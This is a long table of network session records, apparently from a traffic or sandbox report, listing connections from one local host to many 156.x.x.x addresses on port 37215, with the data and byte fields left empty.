                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10928192.168.2.1535066156.13.48.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10929192.168.2.1558404156.248.193.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10930192.168.2.1538182156.215.163.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10931192.168.2.1535134156.28.61.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10932192.168.2.1546080156.149.187.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10933192.168.2.1556418156.169.109.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10934192.168.2.1542880156.76.117.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10935192.168.2.1534610156.104.121.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10936192.168.2.1551974156.25.54.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10937192.168.2.1537766156.253.84.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10938192.168.2.1553626156.236.80.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10939192.168.2.1559992156.115.238.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10940192.168.2.1554822156.124.205.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10941192.168.2.1553846156.40.159.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10942192.168.2.1540394156.56.52.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10943192.168.2.1543282156.213.134.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10944192.168.2.1537640156.53.38.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10945192.168.2.1557514156.44.119.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10946192.168.2.1537028156.150.110.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10947192.168.2.1544168156.123.110.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10948192.168.2.1549362156.109.50.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10949192.168.2.1556780156.39.172.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10950192.168.2.1556480156.241.205.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10951192.168.2.1538268156.53.10.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10952192.168.2.1540618156.201.230.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10953192.168.2.1541596156.50.45.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10954192.168.2.1559388156.116.154.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10955192.168.2.1543094156.64.45.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10956192.168.2.1548316156.43.78.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10957192.168.2.1541544156.45.65.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10958192.168.2.1542424156.86.59.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10959192.168.2.1558598156.62.247.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10960192.168.2.1536200156.16.179.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10961192.168.2.1533228156.27.165.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10962192.168.2.1557540156.205.60.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10963192.168.2.1544310156.217.24.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10964192.168.2.1559436156.49.234.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10965192.168.2.1539250156.107.152.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10966192.168.2.1553806156.28.39.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10967192.168.2.1539316156.107.170.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10968192.168.2.1546908156.12.197.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10969192.168.2.1534082156.199.0.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10970192.168.2.1538180156.189.113.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10971192.168.2.1551200156.223.227.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10972192.168.2.1549170156.201.46.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10973192.168.2.1554016156.52.146.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10974192.168.2.1545226156.98.250.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10975192.168.2.1537368156.212.207.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10976192.168.2.1559620156.222.42.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10977192.168.2.1553092156.242.63.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10978192.168.2.1549932156.56.198.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10979192.168.2.1545910156.63.232.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10980192.168.2.1539602156.72.115.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10981192.168.2.1537204156.38.25.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10982192.168.2.1558936156.15.49.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10983192.168.2.1560638156.45.44.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10984192.168.2.1548122156.220.9.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10985192.168.2.1542160156.73.75.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10986192.168.2.1541896156.246.59.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10987192.168.2.1538152156.37.114.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10988192.168.2.1554664156.153.120.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10989192.168.2.1558362156.139.101.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10990192.168.2.1541780156.142.203.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10991192.168.2.1537458156.193.20.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10992192.168.2.1553414156.27.137.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10993192.168.2.1535390156.173.240.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10994192.168.2.1558066156.237.8.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10995192.168.2.1557028156.133.21.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10996192.168.2.1542150156.189.2.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10997192.168.2.1540688156.246.158.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10998192.168.2.1544584156.163.6.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10999192.168.2.1556136156.242.196.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11000192.168.2.1537704156.148.247.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11001192.168.2.1551286156.22.136.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11002192.168.2.1555100156.217.37.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11003192.168.2.1559396156.32.111.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11004192.168.2.1557194156.243.35.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11005192.168.2.1540014156.204.165.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11006192.168.2.1551362156.7.189.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11007192.168.2.1555706156.28.208.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11008192.168.2.1558108156.211.46.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11009192.168.2.1536732156.198.161.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11010192.168.2.1547886156.151.146.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11011192.168.2.1536404156.86.139.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11012192.168.2.1560590156.188.187.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11013192.168.2.1555390156.77.90.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11014192.168.2.1559474156.219.102.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11015192.168.2.1546368156.163.97.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11016192.168.2.1549598156.197.72.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11017192.168.2.1536422156.32.136.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11018192.168.2.1547642156.251.86.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11019192.168.2.1552328156.83.89.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11020192.168.2.1555522156.226.215.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11021192.168.2.1537886156.32.157.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11022192.168.2.1559216156.135.66.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11023192.168.2.1532882156.247.149.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11024192.168.2.1540730156.241.145.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11025192.168.2.1553248156.81.189.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11026192.168.2.1556742156.164.184.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11027192.168.2.1558482156.42.97.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11028192.168.2.1542634156.68.110.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11029192.168.2.1554304156.196.82.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11030192.168.2.1560662156.85.72.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11031192.168.2.1540746156.85.92.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11032192.168.2.1534702156.234.139.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11033192.168.2.1534122156.126.30.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11034192.168.2.1540080156.140.72.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11035192.168.2.1546608156.128.49.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11036192.168.2.1552662156.249.76.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11037192.168.2.1554132156.138.195.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11038192.168.2.1534408156.44.127.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11039192.168.2.1557888156.196.224.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11040192.168.2.1541028156.125.227.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11041192.168.2.1551850156.24.253.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11042192.168.2.1555972156.58.126.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11043192.168.2.1554432156.120.82.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11044192.168.2.1545192156.119.157.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11045192.168.2.1551210156.130.9.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11046192.168.2.1556846156.114.250.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11047192.168.2.1560832156.205.162.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11048192.168.2.1534810156.175.68.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11049192.168.2.1540626156.116.105.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11050192.168.2.1546864156.208.209.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11051192.168.2.1544476156.154.222.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11052192.168.2.1547748156.33.201.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11053192.168.2.1534366156.210.72.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11054192.168.2.1544082156.143.48.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11055192.168.2.1537442156.146.199.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11056192.168.2.1550132156.1.222.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11057192.168.2.1546530156.122.14.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11058192.168.2.1555156156.73.23.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11059192.168.2.1547220156.59.139.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11060192.168.2.1539428156.118.128.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11061192.168.2.1555504156.151.156.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11062192.168.2.1552560156.110.0.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11063192.168.2.1547722156.14.113.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11064192.168.2.1552644156.27.231.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11065192.168.2.1533914156.167.213.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11066192.168.2.1552198156.114.22.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11067192.168.2.1539460156.16.150.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11068192.168.2.1540054156.20.148.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11069192.168.2.1541316156.70.33.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11070192.168.2.1540808156.5.151.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11071192.168.2.1553544156.221.202.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11072192.168.2.1547396156.117.215.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11073192.168.2.1553742156.29.120.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11074192.168.2.1546558156.131.207.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11075192.168.2.1556274156.26.236.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11076192.168.2.1556650156.169.207.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11077192.168.2.1543456156.86.144.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11078192.168.2.1543238156.118.161.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11079192.168.2.1541054156.248.60.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11080192.168.2.1555336156.23.206.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11081192.168.2.1557930156.146.159.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11082192.168.2.1541038156.145.27.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11083192.168.2.1535318156.198.44.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11084192.168.2.1550342156.16.142.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11085192.168.2.1542420156.54.200.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11086192.168.2.1544676156.126.77.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11087192.168.2.1547728156.129.113.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11088192.168.2.1535376156.76.101.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11089192.168.2.1558178156.154.99.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11090192.168.2.1553804156.49.61.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11091192.168.2.1551310156.105.205.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11092192.168.2.1538244156.171.84.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11093192.168.2.1550154156.57.101.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11094192.168.2.1559984156.150.255.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11095192.168.2.1556044156.147.238.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11096192.168.2.1539170156.194.10.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11097192.168.2.1541780156.182.102.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11098192.168.2.1554934156.181.12.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11099192.168.2.1557964156.234.253.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11100192.168.2.1545744156.219.91.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11101192.168.2.1547636156.50.110.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11102192.168.2.1551722156.171.28.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11103192.168.2.1549128156.7.237.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11104192.168.2.1546910156.173.249.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11105192.168.2.1556766156.172.40.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11106192.168.2.1550246156.191.118.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11107192.168.2.1535206156.215.229.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11108192.168.2.1545866156.248.213.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11109192.168.2.1533360156.64.120.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11110192.168.2.1555842156.172.215.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11111192.168.2.1542012156.3.7.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11112192.168.2.1557302156.127.159.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11113192.168.2.1558332156.83.249.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11114192.168.2.1543278156.152.233.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11115192.168.2.1549844156.137.207.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11116192.168.2.1538454156.20.144.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11117192.168.2.1544346156.119.104.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11118192.168.2.1553626156.194.191.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11119192.168.2.1544906156.252.16.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11120192.168.2.1539766156.230.152.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11121192.168.2.1547532156.30.11.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11122192.168.2.1533438156.117.119.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11123192.168.2.1534700156.171.230.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11124192.168.2.1546736156.143.229.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11125192.168.2.1546298156.206.183.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11126192.168.2.1550844156.196.77.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11127192.168.2.1558702156.239.182.9937215
                                                                            TimestampBytes transferredDirectionData


